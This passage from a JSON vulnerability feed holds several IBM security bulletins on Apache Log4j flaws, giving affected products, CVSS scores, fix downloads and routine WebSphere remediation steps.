References 
\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n31 Dec 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7UH9\",\"label\":\"Tivoli Netcool Configuration Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {}, "published": "2022-01-13T05:23:19", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server, which is a required product for IBM Tivoli Netcool Configuration Manager (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-01-13T05:23:19", "id": "D9425756DF631BB7CA03B3451BD1F9C557325B8A2BB0CD34A22102962A0F4213", "href": "https://www.ibm.com/support/pages/node/6540524", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-25T23:39:30", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix upgrades all Apache Log4j 1.x to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \nIBM Sterling External Authentication Server| 2.4.3.2 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| iFix| Remediation \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling External Authentication Server| 2.4.3.2| iFix 13 Plus Build 296| [Fix Central - 2432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=2.4.3.2&platform=All&function=all> \"Fix Central - 2432\" ) \nThis fix also remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2, 2.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T19:03:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Secure External Authentication Server (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T19:03:49", "id": 
"B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "href": "https://www.ibm.com/support/pages/node/6538954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nThe following security issue has been identified in components related to IBM Tivoli Monitoring (ITM) portal server and client. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 \n \n## Remediation/Fixes\n\nIn addition to the CVE in this bulletin the following are also addressed by the WebSphere patch below:\n\n[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)\n\n \nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0010| 6.3.0.7 Fix Pack 7 Service Pack 10| <https://www.ibm.com/support/pages/node/6550868> \n6.X.X-TIV-ITM_TEPS_WAS-IHS_ALL_8.55.20.02| 6.3.0.7 Fix Pack 7 Service Pack 5 or later| <https://www.ibm.com/support/pages/node/6538128> \n \n## Workarounds and Mitigations\n\nNone of the vulnerable instances of log4j are actually used by ITM. If enabled, the IBM Tivoli Monitoring dashboard data provider may be using log4j client libraries which are not the actual log4j core function. 
Note all versions of log4j components are only installed if you've installed one of the following components:\n\ncj Tivoli Enterprise Portal Desktop Client \ncw Tivoli Enterprise Portal Browser Client \ncq Tivoli Enterprise Portal Server \n\nThe provided remediation will safely remove or update all vulnerable instances of log4j.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n31 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZ8F3\",\"label\":\"IBM Tivoli Monitoring V6\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.3.0.7\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T20:11:37", "type": "ibm", "title": "Security Bulletin: Vulnerablity in Apache Log4j may affect IBM Tivoli Monitoring (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-31T20:11:37", "id": "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "href": 
"https://www.ibm.com/support/pages/node/6551452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T23:45:08", "description": "## Summary\n\nThere are multiple vulnerabilities in Log4j used by IBM Content Integrator. IBM Content Integrator is not affected by these vulnerabilities. However, the team has addressed vulnerabilities by removing references.\n\n## Vulnerability Details\n\n**CVEID: CVE-2021-44228** \nDESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure \nto protect against attacker-controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially \ncrafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take \ncomplete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/214921 for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n**CVEID: CVE-2021-45046** \nDESCRIPTION: Apache Log4j could result in remote code execution, caused by an incomplete fix \nof CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default \nPattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft \nmalicious input data using a JNDI Lookup pattern to leak sensitive \ninformation and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215195 for the current score. 
\nCVSS Vector: Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n**CVEID: CVE-2021-45105** \nDESCRIPTION: Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled \nrecursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could \ncraft malicious input data that contains a recursive lookup to cause a StackOverflowError \nthat will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215647 for the current score. \nCVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n**CVEID: CVE-2021-4104** \nDESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the \ndeserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to \nuse JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215048 for the current score. \nCVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n**CVEID: CVE-2021-38951** \nDESCRIPTION: IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to a denial of service, \ncaused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to \ncause the server to consume all available CPU resources. IBM X-Force ID: 211405. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/211405 for the current score. 
\nCVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Content Integrator | 8.6 \n \n## Remediation/Fixes\n\nIBM Content Integrator 8.6.0.4 IF0009 [Fix Central](<https://www.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=ICI_8604-IF0009&continue=1> \"Fix Central\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n5 May 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWLLY\",\"label\":\"Content Integrator\"},\"ARM Category\":[{\"code\":\"a8m0z000000cwNnAAI\",\"label\":\"Content Integrator\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-05T14:49:44", "type": "ibm", "title": "Security Bulletin: IBM Content Integrator is not affected by multiple vulnerabilities in Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38951", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-05T14:49:44", "id": "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "href": "https://www.ibm.com/support/pages/node/6582359", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T23:48:42", "description": "## Summary\n\nWebSphere Application Server (WAS) is shipped as a component of IBM Security Guardium Key Lifecycle Manager (GKLM). Information about the Apache Log4j vulnerability has been published in a security bulletin. Customers are encouraged to take quick action to update their systems.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n\n\n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.\n\n \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version(s)** \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customers with extension.\n\n## Remediation/Fixes\n\n**IMPORTANT**\n\nThe fix in this bulletin has been superseded by [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539408>). \n--- \n \n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nDepending on your GKLM/SKLM version, see the relevant section:\n\n * For SKLM 3.0, 3.0.1 and SKLM 4.0\n * For GKLM 4.1\n * For GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1 and SKLM 4.0\n\nFor information about the vulnerability fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ).\n\nYou only need to apply the interim fix provided by the WAS team. 
Before you apply the interim fix, check the WAS minimum fix pack requirement and the supported WAS for your SKLM version (see [Support Matrix](<https://www.ibm.com/support/pages/node/296957>)). \n\nFor instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Note:** _Also applicable for SKLM 2.7_ (**only for customers with extension**).\n\n** Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.0\n\n 1. On Linux and AIX systems, log in as the database user. For example, sklmdb41.\n 2. Stop WebSphere Application Server.\n\n**On Linux or AIX:**\n \n WAS_HOME/bin/stopServer.sh\u00a0server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/stopServer.sh server1 -username wasadmin -password waspassword\n\n**On Windows:**\n \n WAS_HOME\\bin\\stopServer.bat server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\stopServer.bat server1 -username wasadmin -password waspassword\n\n 3. Apply the WebSphere Application Server interim fix provided by the WAS team. For instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>). 
\n\nFor information about the vulnerability and fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) . \n\n**Note**: You only need to apply the interim fix provided by the WAS team.\n\n 4. Update Log4j.\n\n 1. Download the latest log4j 2.15.0 files from the following link: \n\n<https://archive.apache.org/dist/logging/log4j/2.15.0/>\n\n 2. Depending on your platform, download the applicable file: \n * apache-log4j-2.15.0-bin.tar.gz\n * apache-log4j-2.15.0-bin.zip\n 3. Extract the downloaded files. Copy the following extracted JAR files to some other location (for example, desktop): \n * log4j-api-2.15.0.jar\n * log4j-core-2.15.0.jar\n 4. Rename the JAR files as follows: \n * log4j-api-2.15.0.jar to log4j-api-2.13.3.jar\n * log4j-core-2.15.0.jar to log4j-core-2.13.3.jar\n\n**Note:** This is a workaround. Because of this workaround, even after you apply the fix, the grep command shows log4j-api-2.13.3.jar version in the output. However, be assured that Log4j is upgraded to log4j-api-2.15.0.jar.\n\n 5. Copy the renamed Log4j JAR files to the following location: \n\n**On Linux or AIX:**\n \n WAS_HOME/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\n**On Windows:**\n \n WAS_HOME\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\n 5. Start WebSphere Application Server. 
\n\n**On Linux or AIX:**\n \n WAS_HOME/bin/startServer.sh server1\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/startServer.sh server1\n\n**On Windows:**\n \n WAS_HOME\\bin\\startServer.bat server1\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\startServer.bat server1\n\n**Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required.\n\n* * *\n\n## For GKLM 4.1.1\n\nThis issue is fixed in [GKLM 4.1.1 - Fix Pack 2](<https://www.ibm.com/support/pages/node/6525282> \"GKLM 4.1.1 - Fix Pack 2\" ). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n* * *\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
